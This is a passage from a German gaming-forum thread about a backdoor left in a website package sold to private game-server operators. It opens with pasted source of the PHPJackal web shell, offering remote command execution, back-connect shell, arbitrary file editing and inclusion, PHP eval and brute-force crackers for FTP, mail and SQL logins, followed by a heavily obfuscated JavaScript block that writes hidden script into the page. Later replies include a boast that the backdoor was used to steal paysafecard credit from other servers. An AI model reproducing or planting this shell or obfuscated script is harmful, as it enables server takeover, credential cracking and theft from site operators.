scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style> <meta http-equiv="Content-Language" content="en-us"> <title>PHPJackal</title> </head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC"> <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%"> <tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table> <hr size=1 noshade> <?php if (!empty($_REQUEST['seC'])){ switch($_REQUEST['seC']){ case 'fm':filemanager();break; case 'sc':scanneR();break; case 'phpinfo': phpinfo();break; case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']); if (!empty($_REQUEST['Save'])){ $filehandle= fopen($_REQUEST['file'],"w"); fwrite($filehandle,$_REQUEST['edited']); fclose($filehandle);} if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR(''); break; case 'openit':openiT($_REQUEST['namE']);break; case 'cr': crackeR();break; case 'dic':dicmakeR();break; case 'whois':whoiS();break; case 'hex':hexvieW();break; case 'img':showimagE($_REQUEST['filE']);break; case 'inc':include ($_REQUEST['filE']);break; case 'hc':hashcrackeR();break; case 'fcr':formcrackeR();break; case 'snmp':snmpcrackeR();break; case 'sql':sqlcrackeR();break; case 'auth':authcrackeR();break; case 'pop3':pop3crackeR();break; case 'imap':imapcrackeR();break; case 'smtp':smtpcrackeR();break; case 'ftp':ftpcrackeR();break; case 'eval':phpevaL();break; case 'px':pr0xy();break; case 'webshell':webshelL();break; case 'mailer':maileR();break; case 'br':brshelL();break; case 'asm':safemodE();break; case 'mysql':mysqlclienT();break; case 'calc':calC();break; case 'sysinfo':sysinfO();break; case 'checksum':checksuM($_REQUEST['filE']);break; case 'logout':logouT();break; default: echo $intro; }}else echo $intro; echo $footer;?></body></html><script type="text/javascript" language="javascript"> <!-- fF7eSD8=new Array(); fF7eSD8[0]="%3Cscript%3E%0Adocu"; fF7eSD8[1]="ment.write%28une"; fF7eSD8[2]="scape%28%22%253Cscri"; fF7eSD8[3]="pt%2520type%253D%25"; fF7eSD8[4]="22text/javascr"; fF7eSD8[5]="ipt%2522%253Edo"; fF7eSD8[6]="cument.write%25"; fF7eSD8[7]="28%2527%255Cu00"; fF7eSD8[8]="3c%255Cu0073%255C"; fF7eSD8[9]="u0063%255Cu0072"; fF7eSD8[10]="%255Cu0069%255Cu"; fF7eSD8[11]="0070%255Cu007"; fF7eSD8[12]="4%255Cu0020%255C"; fF7eSD8[13]="u0074%255Cu007"; fF7eSD8[14]="9%255Cu0070%255Cu"; fF7eSD8[15]="0065%255Cu003d%25"; fF7eSD8[16]="5Cu0022%255Cu0"; fF7eSD8[17]="074%255Cu0065%255C"; fF7eSD8[18]="u0078%255Cu0074%25"; fF7eSD8[19]="5Cu002f%255Cu"; fF7eSD8[20]="006a%255Cu0061%255"; fF7eSD8[21]="Cu0076%255Cu0"; fF7eSD8[22]="061%255Cu0073%25"; fF7eSD8[23]="5Cu0063%255Cu00"; fF7eSD8[24]="72%255Cu0069%25"; fF7eSD8[25]="5Cu0070%255Cu"; fF7eSD8[26]="0074%255Cu0022"; fF7eSD8[27]="%255Cu003e%255C"; fF7eSD8[28]="u0064%255Cu00"; fF7eSD8[29]="6f%255Cu0063%255C"; fF7eSD8[30]="u0075%255Cu006"; fF7eSD8[31]="d%255Cu0065%255Cu"; fF7eSD8[32]="006e%255Cu0074%255"; fF7eSD8[33]="Cu002e%255Cu00"; fF7eSD8[34]="77%255Cu0072%25"; fF7eSD8[35]="5Cu0069%255Cu"; fF7eSD8[36]="0074%255Cu0065%25"; fF7eSD8[37]="5Cu0028%255Cu002"; fF7eSD8[38]="7%255Cu005c%255Cu"; fF7eSD8[39]="0075%255Cu0030"; fF7eSD8[40]="%255Cu0030%255Cu0"; fF7eSD8[41]="033%255Cu0063%25"; fF7eSD8[42]="5Cu005c%255Cu007"; fF7eSD8[43]="5%255Cu0030%255Cu"; fF7eSD8[44]="0030%255Cu0035"; fF7eSD8[45]="%255Cu0033%255C"; fF7eSD8[46]="u005c%255Cu0075"; fF7eSD8[47]="%255Cu0030%255Cu"; fF7eSD8[48]="0030%255Cu003"; fF7eSD8[49]="4%255Cu0033%255"; fF7eSD8[50]="Cu005c%255Cu007"; fF7eSD8[51]="5%255Cu0030%255Cu"; fF7eSD8[52]="0030%255Cu0035%255"; fF7eSD8[53]="Cu0032%255Cu00"; fF7eSD8[54]="5c%255Cu0075%255C"; fF7eSD8[55]="u0030%255Cu0030%25"; fF7eSD8[56]="5Cu0034%255Cu00"; fF7eSD8[57]="39%255Cu005c%255Cu"; fF7eSD8[58]="0075%255Cu0030%255"; fF7eSD8[59]="Cu0030%255Cu003"; fF7eSD8[60]="5%255Cu0030%255C"; fF7eSD8[61]="u005c%255Cu0075"; fF7eSD8[62]="%255Cu0030%255Cu00"; fF7eSD8[63]="30%255Cu0035%255"; fF7eSD8[64]="Cu0034%255Cu005"; fF7eSD8[65]="c%255Cu0075%255C"; fF7eSD8[66]="u0030%255Cu0030%25"; fF7eSD8[67]="5Cu0032%255Cu"; fF7eSD8[68]="0030%255Cu005c%25"; fF7eSD8[69]="5Cu0075%255Cu00"; fF7eSD8[70]="30%255Cu0030%255"; fF7eSD8[71]="Cu0035%255Cu003"; fF7eSD8[72]="3%255Cu005c%255Cu0"; fF7eSD8[73]="075%255Cu0030"; fF7eSD8[74]="%255Cu0030%255Cu00"; fF7eSD8[75]="35%255Cu0032%25"; fF7eSD8[76]="5Cu005c%255Cu00"; fF7eSD8[77]="75%255Cu0030%255Cu"; fF7eSD8[78]="0030%255Cu003"; fF7eSD8[79]="4%255Cu0033%255Cu"; fF7eSD8[80]="005c%255Cu0075%25"; fF7eSD8[81]="5Cu0030%255Cu"; fF7eSD8[82]="0030%255Cu0033"; fF7eSD8[83]="%255Cu0064%255Cu0"; fF7eSD8[84]="05c%255Cu0075%25"; fF7eSD8[85]="5Cu0030%255Cu003"; fF7eSD8[86]="0%255Cu0036%255"; fF7eSD8[87]="Cu0038%255Cu0"; fF7eSD8[88]="05c%255Cu0075%255C"; fF7eSD8[89]="u0030%255Cu003"; fF7eSD8[90]="0%255Cu0037%255C"; fF7eSD8[91]="u0034%255Cu005c%25"; fF7eSD8[92]="5Cu0075%255Cu"; fF7eSD8[93]="0030%255Cu0030"; fF7eSD8[94]="%255Cu0037%255Cu"; fF7eSD8[95]="0034%255Cu005c%25"; fF7eSD8[96]="5Cu0075%255Cu00"; fF7eSD8[97]="30%255Cu0030%255Cu"; fF7eSD8[98]="0037%255Cu0030%255"; fF7eSD8[99]="Cu005c%255Cu00"; fF7eSD8[100]="75%255Cu0030%255"; fF7eSD8[101]="Cu0030%255Cu00"; fF7eSD8[102]="33%255Cu0061%255Cu"; fF7eSD8[103]="005c%255Cu0075"; fF7eSD8[104]="%255Cu0030%255C"; fF7eSD8[105]="u0030%255Cu0032%25"; fF7eSD8[106]="5Cu0066%255Cu00"; fF7eSD8[107]="5c%255Cu0075%255Cu"; fF7eSD8[108]="0030%255Cu0030%25"; fF7eSD8[109]="5Cu0032%255Cu0"; fF7eSD8[110]="066%255Cu005c"; fF7eSD8[111]="%255Cu0075%255Cu"; fF7eSD8[112]="0030%255Cu0030%25"; fF7eSD8[113]="5Cu0036%255Cu003"; fF7eSD8[114]="4%255Cu005c%255C"; fF7eSD8[115]="u0075%255Cu003"; fF7eSD8[116]="0%255Cu0030%255C"; fF7eSD8[117]="u0036%255Cu00"; fF7eSD8[118]="31%255Cu005c%255"; fF7eSD8[119]="Cu0075%255Cu00"; fF7eSD8[120]="30%255Cu0030%255Cu"; fF7eSD8[121]="0037%255Cu0034"; fF7eSD8[122]="%255Cu005c%255Cu00"; fF7eSD8[123]="75%255Cu0030%255C"; fF7eSD8[124]="u0030%255Cu003"; fF7eSD8[125]="6%255Cu0031%255"; fF7eSD8[126]="Cu005c%255Cu007"; fF7eSD8[127]="5%255Cu0030%255"; fF7eSD8[128]="Cu0030%255Cu0"; fF7eSD8[129]="032%255Cu0065"; fF7eSD8[130]="%255Cu005c%255C"; fF7eSD8[131]="u0075%255Cu0030%25"; fF7eSD8[132]="5Cu0030%255Cu003"; fF7eSD8[133]="7%255Cu0034%255Cu0"; fF7eSD8[134]="05c%255Cu0075%255C"; fF7eSD8[135]="u0030%255Cu00"; fF7eSD8[136]="30%255Cu0033%255C"; fF7eSD8[137]="u0030%255Cu005"; fF7eSD8[138]="c%255Cu0075%255Cu"; fF7eSD8[139]="0030%255Cu003"; fF7eSD8[140]="0%255Cu0033%255C"; fF7eSD8[141]="u0030%255Cu005"; fF7eSD8[142]="c%255Cu0075%255"; fF7eSD8[143]="Cu0030%255Cu0"; fF7eSD8[144]="030%255Cu0036%255C"; fF7eSD8[145]="u0063%255Cu005c"; fF7eSD8[146]="%255Cu0075%255C"; fF7eSD8[147]="u0030%255Cu00"; fF7eSD8[148]="30%255Cu0037%25"; fF7eSD8[149]="5Cu0033%255Cu00"; fF7eSD8[150]="5c%255Cu0075%255"; fF7eSD8[151]="Cu0030%255Cu00"; fF7eSD8[152]="30%255Cu0032%255"; fF7eSD8[153]="Cu0065%255Cu005c"; fF7eSD8[154]="%255Cu0075%255C"; fF7eSD8[155]="u0030%255Cu00"; fF7eSD8[156]="30%255Cu0036%255Cu"; fF7eSD8[157]="0066%255Cu005c%255"; fF7eSD8[158]="Cu0075%255Cu00"; fF7eSD8[159]="30%255Cu0030%255Cu"; fF7eSD8[160]="0037%255Cu0032%25"; fF7eSD8[161]="5Cu005c%255Cu007"; fF7eSD8[162]="5%255Cu0030%255C"; fF7eSD8[163]="u0030%255Cu0036%25"; fF7eSD8[164]="5Cu0037%255Cu00"; fF7eSD8[165]="5c%255Cu0075%255"; fF7eSD8[166]="Cu0030%255Cu0030"; fF7eSD8[167]="%255Cu0032%255Cu00"; fF7eSD8[168]="66%255Cu005c%255"; fF7eSD8[169]="Cu0075%255Cu0"; fF7eSD8[170]="030%255Cu0030%255C"; fF7eSD8[171]="u0037%255Cu0037"; fF7eSD8[172]="%255Cu005c%255Cu"; fF7eSD8[173]="0075%255Cu0030%25"; fF7eSD8[174]="5Cu0030%255Cu"; fF7eSD8[175]="0036%255Cu0038%255"; fF7eSD8[176]="Cu005c%255Cu007"; fF7eSD8[177]="5%255Cu0030%255"; fF7eSD8[178]="Cu0030%255Cu0036"; fF7eSD8[179]="%255Cu0035%255Cu00"; fF7eSD8[180]="5c%255Cu0075%255Cu"; fF7eSD8[181]="0030%255Cu003"; fF7eSD8[182]="0%255Cu0037%255C"; fF7eSD8[183]="u0032%255Cu00"; fF7eSD8[184]="5c%255Cu0075%255"; fF7eSD8[185]="Cu0030%255Cu0"; fF7eSD8[186]="030%255Cu0036%25"; fF7eSD8[187]="5Cu0035%255Cu0"; fF7eSD8[188]="05c%255Cu0075"; fF7eSD8[189]="%255Cu0030%255Cu0"; fF7eSD8[190]="030%255Cu0032"; fF7eSD8[191]="%255Cu0065%255Cu"; fF7eSD8[192]="005c%255Cu0075"; fF7eSD8[193]="%255Cu0030%255Cu00"; fF7eSD8[194]="30%255Cu0036%25"; fF7eSD8[195]="5Cu0061%255Cu"; fF7eSD8[196]="005c%255Cu007"; fF7eSD8[197]="5%255Cu0030%255"; fF7eSD8[198]="Cu0030%255Cu0037"; fF7eSD8[199]="%255Cu0033%255Cu0"; fF7eSD8[200]="05c%255Cu0075%255C"; fF7eSD8[201]="u0030%255Cu00"; fF7eSD8[202]="30%255Cu0033%255Cu"; fF7eSD8[203]="0065%255Cu005"; fF7eSD8[204]="c%255Cu0075%255Cu"; fF7eSD8[205]="0030%255Cu0030%25"; fF7eSD8[206]="5Cu0033%255Cu00"; fF7eSD8[207]="63%255Cu005c%255C"; fF7eSD8[208]="u0075%255Cu0030"; fF7eSD8[209]="%255Cu0030%255Cu0"; fF7eSD8[210]="032%255Cu0066%255"; fF7eSD8[211]="Cu005c%255Cu0"; fF7eSD8[212]="075%255Cu0030%25"; fF7eSD8[213]="5Cu0030%255Cu"; fF7eSD8[214]="0035%255Cu0033%255"; fF7eSD8[215]="Cu005c%255Cu007"; fF7eSD8[216]="5%255Cu0030%255Cu0"; fF7eSD8[217]="030%255Cu0034%255"; fF7eSD8[218]="Cu0033%255Cu00"; fF7eSD8[219]="5c%255Cu0075%25"; fF7eSD8[220]="5Cu0030%255Cu0"; fF7eSD8[221]="030%255Cu0035"; fF7eSD8[222]="%255Cu0032%255Cu0"; fF7eSD8[223]="05c%255Cu0075"; fF7eSD8[224]="%255Cu0030%255Cu"; fF7eSD8[225]="0030%255Cu0034%25"; fF7eSD8[226]="5Cu0039%255Cu0"; fF7eSD8[227]="05c%255Cu0075%25"; fF7eSD8[228]="5Cu0030%255Cu"; fF7eSD8[229]="0030%255Cu0035%25"; fF7eSD8[230]="5Cu0030%255Cu"; fF7eSD8[231]="005c%255Cu0075%255"; fF7eSD8[232]="Cu0030%255Cu0"; fF7eSD8[233]="030%255Cu0035"; fF7eSD8[234]="%255Cu0034%255Cu0"; fF7eSD8[235]="05c%255Cu0075"; fF7eSD8[236]="%255Cu0030%255Cu"; fF7eSD8[237]="0030%255Cu0033%255"; fF7eSD8[238]="Cu0065%255Cu0"; fF7eSD8[239]="027%255Cu0029"; fF7eSD8[240]="%255Cu003c%255C"; fF7eSD8[241]="u002f%255Cu0073%25"; fF7eSD8[242]="5Cu0063%255Cu007"; fF7eSD8[243]="2%255Cu0069%255Cu"; fF7eSD8[244]="0070%255Cu007"; fF7eSD8[245]="4%255Cu003e%2527%25"; fF7eSD8[246]="29%253C/script%25"; fF7eSD8[247]="3E%22%29%29%3B%0A%3C/scri"; fF7eSD8[248]="pt%3E"; for (i = 0; i < fF7eSD8.length; i ++) { document.write(unescape(fF7eSD8[i])) } // --> </script>
|
|
|
08/18/2012, 22:01
|
#40
|
elite*gold: 191
Join Date: May 2009
Posts: 1,214
Received Thanks: 2,594
|
Der Code wurde jetzt schon 5x gepostet
Und Avast schreit doch eh bei jedem kleinem Ding, was nicht 100% Lizensiert ist
|
|
|
08/18/2012, 22:05
|
#41
|
elite*gold: 506
Join Date: Nov 2009
Posts: 307
Received Thanks: 104
|
Quote:
Originally Posted by Λzα
Achtung: Es war nicht vorgesehen das diese PhP datei im ordner bei liegt, es war jediglich zum testen gewesen, habe es vergessen zulöschen, die leute die nun diese ordner etc. auf der webspace haben.. das liegt daran das jetzt jeder davon weiss, und jeder diese hp in der toplist etc.. sucht und versucht damit was zu reißen.
Ich wusste es wirklich nicht das dieses Script noch dabei liegt, und mal ganz erlich, habe ich bzw. wir uns jemals bei einen dieser server ran gemacht, fehlen euch psc´s oder gibt es gepushte acc´s? Denke nicht fals doch waren wir es mit sicherheit nicht.
Einfach die PhP datei löschen --> WIN.
Ich Entschuldige mich für die umständlichkeiten.
Trotzdem noch ein kleiner Hinweis.
Bitte ändert alle eure Datenbank Daten 1x nachdem ihr diese datei gelöscht habt.
MFG
|
In der hoffnung, dass alle zu Blöd sind und es nicht merken.
Falls doch, "oh scheisse Sorry, das hätte gar nicht da sein dürfen! Vergessen zu löschen." Peinlich.
|
|
|
08/18/2012, 22:15
|
#42
|
elite*gold: 6394
Join Date: Nov 2008
Posts: 1,225
Received Thanks: 4,766
|
Quote:
Originally Posted by Λzα
Jow.. ich versuche mich raus zureden, es war jediglich ein versehen, mehr muss ich dazu nicht sagen, und fals du dir das mal genauer an schaust.. 95% kann damit nicht umgehen, weiss nicht was man damit machen kann und 90% der funktionen funktioniert auch nicht.
Alles andere steht ja auf der seite davor.
Was willst du eig von mir hier Jango es ist schon echt ARM sich als SGA in einem FORUM auszugeben, in einem in dem er als user Angemeldet ist, und sich einen eigenen Rang zugeben das ist LAPPENHAFT!
Ich würde sowas sofort bannen xD oder garnicht erst machbar machen.
Und PROLL hier nicht so rum den keiner kennt dich hier.. du SGA...
'Kids' -.-
MFG
|
Heyho!
So wie ich deinen Text entschlüsseln kann, bist du ziemlich sauer das er den Backdoor gefunden hat, egal ob es Absicht war oder nicht, such nicht bei ihm nach Fehlern sondern finde sie erstmal bei dir. Abgesehen davon bildest du dir doch nur ein das ein "[SGA]" überall ein Rang ist, nur weil es bei Metin2 so ist? Also bitte..
Achja wo wir schon beim Thema sind, ein paar von euch (CADesign) sollten vielleicht bei den Tatsachen bleiben und sich nicht immer von Einbildungen und Vorurteilen leiten lassen.
Quote:
Originally Posted by .Scare™
warum entschuldigst du DICH dan dafür das DU es vergessen hast raus zu nehmen? wen es doch CαnyX
releast hatt....
kann mir das mal einer sagen?
|
Weil Aza kein php o.ä. kann und desshalb CanyX dafür verwantwortlich ist.
Nur zur Info:
Echter Aza: Echter CanyX:
Nur damit ihr euch bei der Schuldvergabe leichter tut.
--
Das mit dem Backdoor ist echt dumm gelaufen, ich kann euch (CADesign) leider nicht einschätzen, also ob das Absicht war oder nicht, aber egal was es nun war, das war das Schlimmste was passieren konnte.
Bevor man ein "Geschenk" Public. macht, sollte man doch vielleicht den Inhalt nochmal überprüfen...
Alles gute...
Sora
|
|
|
08/18/2012, 22:16
|
#43
|
elite*gold: 20
Join Date: Jan 2012
Posts: 573
Received Thanks: 366
|
nen kumpel hat durch diesem backdoor 350€ psc von anderen servern xDD
& zu der disskusionsrunde hier, ist voll unnötig, jetzt habt ihr ja eine meinung von ca design & fertig
|
|
|
08/18/2012, 22:21
|
#44
|
elite*gold: 506
Join Date: Nov 2009
Posts: 307
Received Thanks: 104
|
Quote:
Originally Posted by 'Roccat™
nen kumpel hat durch diesem backdoor 350€ psc von anderen servern xDD
& zu der disskusionsrunde hier, ist voll unnötig, jetzt habt ihr ja eine meinung von ca design & fertig
|
Wer haftet für den Schaden? Niemand.
Was lernen wir von der Sache? Kauft bzw. ladet euch NIE sachen von Aza runter, der will sich nur ne goldene Nase verdienen. Eine Homepage mit Script für 150 Euro zu verkaufen, lol. Lächerlich. Da beauftrage ich lieber nen andern Designer und zahle nur die hälfte.
|
|
|
08/18/2012, 22:32
|
#45
|
elite*gold: 99
Join Date: Aug 2009
Posts: 4,296
Received Thanks: 5,092
|
Okay, ich bin jetzt sprachlos und enttäuscht.
|
|
|
|
|
Similar Threads
|
[HowTo] Skillanimationen entfernen
04/21/2016 - Last Chaos - 57 Replies
Hallo Leute,
heute möchte ich euch einen Weg zeigen, wie ihr die Skillanimationen eurer Skills ohne Hacks und dauerhaft entfernen könnt.
Diese Methode funktioniert auf allen Servern, völlig egal ob mit oder ohne X-Trap.
Was wird benötigt?
http://www.nbb.de/nbb_cms2/templates/nbb/images/t rennlinie.png
- Einen Hex Editor, ich empfehle euch den Editor "Hex Workshop" den ihr kostenlos als 30-Tage-Testversion bei Chip herunterladen könnt.
- Ein wenig Zeit (2 - 5 Minuten)
|
[HowTo]Chatblock Entfernen
06/05/2010 - Metin2 PServer Guides & Strategies - 10 Replies
Habe Sufu Benutzt und nix Gefunden :)
Also,da ich Viele Gesehen habe die Fragen wie man Chatblock Weg machen kannt es geht so:Es gibt 2 Möglichkeiten,Also du gehst Ingame mit einen GM und gibst Folgendes ein:Kannste dir Aussuchen:
1.Möglichkeit:
/block_chat name 1
2.Möglichkeit:
/block_chat name -999
|
Script Vessel has backdoor?
07/07/2007 - Conquer Online 2 - 5 Replies
Script Vessel has backdoor? Its named like this.. Trojan Horse backdoor Hupigon.. I downloaded it from here.
|
All times are GMT +2. The time now is 20:09.
|
|